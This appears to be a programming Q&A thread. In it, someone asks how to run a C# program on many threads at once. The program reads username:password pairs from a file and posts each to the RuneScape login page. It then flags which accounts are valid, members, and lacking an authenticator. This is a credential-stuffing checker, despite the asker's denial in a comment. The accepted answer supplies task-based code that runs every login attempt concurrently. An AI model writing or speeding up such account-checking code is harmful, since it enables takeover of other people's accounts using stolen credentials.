# How can I make this c# method multithreaded?

Tags: c#, multithreading

I have this c# class that I am trying to make multi-threaded, or able to run 100 threads (requests?) at once.

```
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Net;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading;
using System.Threading.Tasks;

namespace ConsoleApplication1
{
    class Program
    {
        static void Main(string[] args)
        {
            string[] lines = File.ReadAllLines("C:\\checker/in.txt");
            var accCount = File.ReadLines(@"C:\checker/in.txt").Count();
            Console.Write("Accounts loaded: " + accCount);
            Console.WriteLine();

            foreach (string line in lines)
            {

                string[] account = line.Split(new char[] { ':' });
                string user = account[0];
                string pass = account[1];

                addThreads(user, pass);
                Threads.ForEach(t => t.Start());

                Console.WriteLine();
            }
            // Suspend the screen.
            Console.ReadLine();
        }
        public static List<Thread> Threads = new List<Thread>();

        public static void addThreads(string user, string pass)
        {
            var checker = new Checker();
            Threads.Clear();
            Threads.Add(new Thread(() => { checker.checkAccount(user, pass); }));
            Threads.Add(new Thread(() => { checker.checkAccount(user, pass); }));
            Threads.Add(new Thread(() => { checker.checkAccount(user, pass); }));
            Threads.Add(new Thread(() => { checker.checkAccount(user, pass); }));
            Threads.Add(new Thread(() => { checker.checkAccount(user, pass); }));
            Threads.Add(new Thread(() => { checker.checkAccount(user, pass); }));
            Threads.Add(new Thread(() => { checker.checkAccount(user, pass); }));
        }

    }

    public class Checker
    {
        //declare vars
        string getUsername;
        string getMember;
        string getAuth;
        string check;

        public void checkAccount(string username, string password)
        {
            ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls12;

            byte[] data = Encoding.ASCII.GetBytes(
    $"username={username}&password={password}&mod=www&ssl=1&dest=account_settings.ws");

            WebRequest request = WebRequest.Create("https://secure.runescape.com/m=weblogin/login.ws");
            request.Method = "POST";
            request.ContentType = "application/x-www-form-urlencoded";
            request.ContentLength = data.Length;
            using (Stream stream = request.GetRequestStream())
            {
                stream.Write(data, 0, data.Length);
            }

            string responseContent = null;

            using (WebResponse response = request.GetResponse())
            {
                using (Stream stream = response.GetResponseStream())
                {
                    using (StreamReader sr99 = new StreamReader(stream))
                    {
                        responseContent = sr99.ReadToEnd();
                    }
                }
            }

            //parse captcha
            string patternCaptcha = @"Please\s*complete\s*the\s*reCAPTCHA\s*box";
            string inputCaptcha = responseContent;
            Match matchCaptcha = Regex.Match(inputCaptcha, patternCaptcha);
            string captcha = matchCaptcha.Value;

            if (captcha == "Please complete the reCAPTCHA box")
            {
                captcha = "true";
                Console.Write("captcha,captcha,captcha,captcha");
                Console.WriteLine();
                //return "captcha,captcha,captcha,captcha";
            }
            else
            {
                //parse valid/invalid
                string patternCheck = @"Your\s*login\s*or\s*password\s*was\s*incorrect";
                string inputCheck = responseContent;
                Match matchCheck = Regex.Match(inputCheck, patternCheck);
                check = matchCheck.Value;

                if (check == "Your login or password was incorrect")
                {
                    check = "Invalid";
                }
                else
                {
                    check = "Valid";
                    //parse display name
                    string pattern = @"(<span.*class=.header-top__name.>(.*?)</span>)";
                    string input = responseContent;
                    Match match = Regex.Match(input, pattern);
                    getUsername = match.Groups[2].Value;
                    byte[] bytes = Encoding.Default.GetBytes(getUsername);
                    getUsername = Encoding.UTF8.GetString(bytes);
                    getUsername = getUsername.Replace("?", " ");

                    //parse member status
                    string patternMember = @"(Currently\s*Not\s*a\s*Member)";
                    string inputMember = responseContent;
                    Match matchMember = Regex.Match(inputMember, patternMember);
                    getMember = matchMember.Value;
                    if (getMember == "Currently Not a Member")
                    {
                        getMember = "Non Member";
                    }
                    else
                    {
                        getMember = "Member";
                    }

                    //parse auth status
                    string patternAuthUrl = @"iframe src=\""(.*?)""";
                    string inputAuthUrl = responseContent;
                    Match matchAuthUrl = Regex.Match(inputAuthUrl, patternAuthUrl);
                    string getAuthUrl = matchAuthUrl.Groups[1].Value;

                    using (WebClient client = new WebClient())
                    {
                        string authSource = client.DownloadString(getAuthUrl);

                        string patternAuth = @"RuneScape\s*Authenticator\s*is\s*disabled";
                        string inputAuth = authSource;
                        Match matchAuth = Regex.Match(inputAuth, patternAuth);
                        getAuth = matchAuth.Value;

                        if (getAuth == "RuneScape Authenticator is disabled")
                        {
                            getAuth = "Auth Disabled";
                        }
                        else
                        {
                            getAuth = "Authed";
                        }
                    }
                }
                captcha = "false";
                string curldata = getUsername + "," + getMember + "," + getAuth + "," + check;
                Console.Write(curldata);
                Console.WriteLine();
            }

        }

    }

}
```

Instead of making my program check once per few seconds per post webrequest, how can I make this happen 50-100 times at the same time? Is this possible? Or do I need to do this a different way?

Comment: This looks like you're trying to brute-force your way into people's accounts, no?

Comment: Nope! It's actually communicating with a backend API that displays various stats, such as display name, combat level, etc.

Comment: @Lukeity - Which bit of the `checkAccount` method are you trying to multithread?

Answer (score 2, accepted):

You need to avoid using threads as each thread uses in excess of 1MB of RAM and they are slow to create. You really want to use tasks (TPL) or observables (Rx).

In this case it is quite straight forward to use tasks.

Try this code:

```
string[] lines = File.ReadAllLines("C:\\checker/in.txt");
var accCount = lines.Count();
Console.Write("Accounts loaded: " + accCount);
Console.WriteLine();

var checker = new Checker();

var tasks =
    from line in lines
    let account = line.Split(new char[] { ':' })
    let user = account[0]
    let pass = account[0]
    select Task.Factory.StartNew(() =>  checker.checkAccount(user, pass));

Task.WaitAll(tasks.ToArray());

Console.ReadLine();
```

That will read the text file and queue up a set of tasks to be run to check each line. The `Task.WaitAll` pauses the code until all of the tasks are completed.

This make efficient use of the thread-pool so that you're not wasting valuable resources starting up threads.

Your `checkAccount` is also not thread-safe at the moment. You need to move the field-level variables to be inside your method. It should look something like this:

```
public void checkAccount(string username, string password)
{
    string getUsername;
    string getMember;
    string getAuth;
    string check;
```

Answer (score 0):

It's pretty simple first you need to do a method to call the threads

```
public void CallingThreadsMethod()
    {
        ThreadStart ts = new ThreadStart(SomeFunction);
        Thread t = Thread(ts);
        t.IsBackground = true;
        t.Start();
    }

void Somefunction(){}
```

or if you want many threads you can make a thread list

```
public static List<Thread> Threads = new List<Thread>();

    public static void addThreads()
    {
        Threads.Clear();
        Threads.Add(new Thread(Method1));
        Threads.Add(new Thread(Method2));

    }
```

And start it in you'r main function

```
Vars.addThreads();
Vars.Threads.ForEach(t => t.Start());
```

but if you're using windows forms or wpf i recommend using [BackgroundWorkers](https://msdn.microsoft.com/en-us/library/system.componentmodel.backgroundworker(v=vs.110).aspx)

Comment: Nice. How would I pass data to the threads? Such as this: Threads.Add(new Thread(() => { data = checker.checkAccount(user, displayname); }));

Comment: Threads doesnt share data you just call the method you want

Comment: @Huron_rare - What do you mean by "Threads doesnt share data you just call the method you want"?

Comment: @Enigmativity multithreading isn't doing a new kind of mehod is just a way to call the methodsTthe method will be the same if you get information from it without multithreading doing with multithreading will be the same.

Comment: resuming the method you put in will be the same but running at the same time as others.

Comment: add my skype: lukecode

Comment: @Huron_rare - Are those two comments answering my question? (Please use the `@` notation when replying.)